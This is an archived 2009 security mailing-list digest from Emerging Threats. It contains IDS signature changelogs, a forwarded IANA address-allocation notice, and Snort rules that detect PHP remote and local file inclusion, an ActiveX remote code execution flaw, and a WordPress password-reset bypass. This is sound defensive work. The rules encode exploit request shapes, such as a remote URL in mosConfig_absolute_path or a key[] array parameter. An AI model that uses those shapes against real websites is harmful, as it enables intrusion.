url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-web_sql_injection.rules (2): #Seen being used for vuln scanning. # The original script it's modified from is legitimate, so there may be some falses -> Removed from emerging.rules (1): #broken, replaced with below rule From cunningpike at gmail.com Wed Aug 12 17:02:13 2009 From: cunningpike at gmail.com (CunningPike) Date: Wed, 12 Aug 2009 14:02:13 -0700 Subject: [Emerging-Sigs] Fwd: 175/8 and 182/8 allocated to APNIC In-Reply-To: References: Message-ID: FYI. CP ---------- Forwarded message ---------- From: Leo Vegoda Date: Wed, Aug 12, 2009 at 9:02 AM Subject: 175/8 and 182/8 allocated to APNIC To: Leo Vegoda -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, The IANA IPv4 registry has been updated to reflect the allocation of two /8 IPv4 blocks to APNIC in August 2009: 175/8 and 182/8. You can find the IANA IPv4 registry at: http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.xml http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt Please update your filters as appropriate. Regards, Leo Vegoda Number Resources Manager, IANA -----BEGIN PGP SIGNATURE----- Version: 9.10.0.500 wj8DBQFKguZyvBLymJnAzRwRAmDCAKCCnxLNmk32v+sm786x5RyVLnLBDACcCu5I zCs7FdAdkIZRnfNtuVyVB0s= =6huK -----END PGP SIGNATURE----- -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090812/dc82e812/attachment.html From signatures at stillsecure.com Thu Aug 13 03:29:43 2009 From: signatures at stillsecure.com (signatures) Date: Thu, 13 Aug 2009 01:29:43 -0600 Subject: [Emerging-Sigs] StillSecure: 10 New Signatures - Aug - 13 - 2009 Message-ID: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2938@webmail.latis.com> Hi Matt, Please find 10 New Signatures below: 1. WEB-PHP Clickheat install.clickheat.php mosConfig_absolute_path Remote File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat install.clickheat.php mosConfig_absolute_path Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/install.clickheat.php?"; nocase;uricontent:"GLOBALS[mosConfig_absolute_path]="; nocase; pcre:"/GLOBALS\[mosConfig_absolute_path\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7551; rev:1;) 2. WEB-PHP Clickheat _main.php mosConfig_absolute_path Parameter Remote File Inclusion - 1 alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat _main.php mosConfig_absolute_path Parameter Remote File Inclusion - 1"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/heatmap/_main.php?"; nocase; uricontent:"mosConfig_absolute_path="; nocase; pcre:"/mosConfig_absolute_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7552; rev:1;) 3. WEB-PHP Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion - 2 alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion - 2"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/heatmap/main.php?"; nocase; uricontent:"mosConfig_absolute_path="; nocase; pcre:"/mosConfig_absolute_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7553; rev:1;) 4. WEB-PHP Clickheat Cache.php mosConfig_absolute_path Remote File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat Cache.php mosConfig_absolute_path Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/Clickheat/Cache.php?"; nocase; uricontent:"GLOBALS[mosConfig_absolute_path]="; nocase; pcre:"/GLOBALS\[mosConfig_absolute_path\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7554; rev:1;) 5. WEB-PHP Clickheat Clickheat_Heatmap.php mosConfig_absolute_path Remote File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat Clickheat_Heatmap.php mosConfig_absolute_path Remote File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/Clickheat_Heatmap.php?"; nocase;uricontent:"GLOBALS[mosConfig_absolute_path]="; nocase; pcre:"/GLOBALS\[mosConfig_absolute_path\]=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7555; rev:1;) 6. WEB-PHP Clickheat GlobalVariables.php mosConfig_absolute_path Remote File Inclusion - 1 alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat GlobalVariables.php mosConfig_absolute_path Remote File Inclusion - 1"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/GlobalVariables.php?"; nocase; uricontent:"GLOBALS[mosConfig_absolute_path]="; nocase; pcre:"/GLOBALS\[mosConfig_absolute_path\]=\s*(https?|ftps?|php)\:\//Ui";classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7556;rev:1;) 7. WEB-PHP Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion -2 alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion -2"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/overview/main.php?"; nocase; uricontent:"mosConfig_absolute_path="; nocase; pcre:"/mosConfig_absolute_path=\s*(https?|ftps?|php)\:\//Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/7038; reference:bugtraq,32190; sid:7557; rev:1;) 8. WEB-PHP Cyberfolio css.php theme Parameter Local File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Cyberfolio css.php theme Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/portfolio/css.php?"; nocase; uricontent:"theme="; nocase; content:"../"; classtype:web-application-attack; reference:cve,CVE-2008-6265; reference:bugtraq,32218; reference:url,vupen.com/english/advisories/2008/3070; reference:url,milw0rm.com/exploits/7065; sid:7558; rev:1;) 9. WEB-PHP LWS php User Base unverified.inc.php template Parameter Local File Inclusion alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP LWS php User Base unverified.inc.php template Parameter Local File Inclusion"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/include/unverified.inc.php?"; nocase; uricontent:"template="; nocase; content:"../"; classtype:web-application-attack; reference:bugtraq,27964; reference:url,juniper.net/security/auto/vulnerabilities/vuln27964.html; reference:url,milw0rm.com/exploits/5179; sid:7559; rev:1;) 10. WEB-ATTACKS EDraw PDF Viewer ActiveX Control Remote code execution alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS EDraw PDF Viewer ActiveX Control Remote code execution"; flow:to_client,established; content:"clsid"; nocase; content:"44A8091F-8F01-43B7-8CF7-4BBA71E61E04"; nocase; distance:0; pcre:"/(FtpConnect|FtpDownloadFile)/i"; classtype:web-application-attack; reference:url,secunia.com/advisories/35509/; reference:url,archives.neohapsis.com/archives/fulldisclosure/2009-06/0198.html; sid:7681; rev:1;) Looking forward for your comments, if any.... Thanks & Regards, StillSecure -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090813/99498051/attachment.html From kevross33 at googlemail.com Thu Aug 13 09:27:00 2009 From: kevross33 at googlemail.com (Kevin Ross) Date: Thu, 13 Aug 2009 14:27:00 +0100 Subject: [Emerging-Sigs] some sigs In-Reply-To: <4A8171A8.3010803@jonkmans.com> References: <9d6a1ae60908110623v4c16d66fo2be8b4d3a4dd71a6@mail.gmail.com> <4A8171A8.3010803@jonkmans.com> Message-ID: Nice :) And what about the XSS Sigs? Are they any good? Kev 2009/8/11 Matt Jonkman > Posted this way. Thanks. > > By the way, you both get a sig credit in the contest. One for writing > and one for a significant modification. > > Matt > > Bojan Zdrnja (SANS ISC) wrote: > > On Tue, Aug 11, 2009 at 2:32 PM, Kevin Ross > wrote: > >> Spelling Correction: > >> > >> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible > >> Wordpress Administrative Password Reset Vulnerability"; > >> flow:to_server,established; uricontent:"/wp-login.php?action=3Drp&key="; > >> nocase; classtype:web-application-attack; > >> reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html; > >> sid:1900006; rev:1;) > > > > If I'm not wrong, this will alert on legitimate password resets. You > > want to catch it when key is an array (since that will pass the check > > in Wordpress' PHP code. So, I think this rule would be correct: > > > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS > > (msg:"Possible Wordpress Administrative Password Reset Vulnerability"; > > flow:to_server,established; > > uricontent:"/wp-login.php?action=rp&key[]="; nocase; > > classtype:web-application-attack; > > reference:url,www.securitytracker.com/alerts/2009/Aug/1022707.html; > > sid:1900006; rev:1;) > > > > > > Cheers, > > > > Bojan > > _______________________________________________ > > Emerging-sigs mailing list > > Emerging-sigs at emergingthreats.net > > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > -- > -------------------------------------------- > Matthew Jonkman > Emerging Threats > Open Information Security Foundation (OISF) > Phone 765-429-0398 > Fax 312-264-0205 > http://www.emergingthreats.net > http://www.openinformationsecurityfoundation.org > -------------------------------------------- > > PGP: http://www.jonkmans.com/mattjonkman.asc > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090813/cf10d53a/attachment-0001.html From emerging at emergingthreats.net Thu Aug 13 16:00:12 2009 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Thu, 13 Aug 2009 16:00:12 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20090813200012.3DAEC4504A@goliath.jonkmans.com> [***] Results from Oinkmaster started Thu Aug 13 16:00:12 2009 [***] [*] Rules modifications: [*] None. [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (64): 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (64): 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (101) || 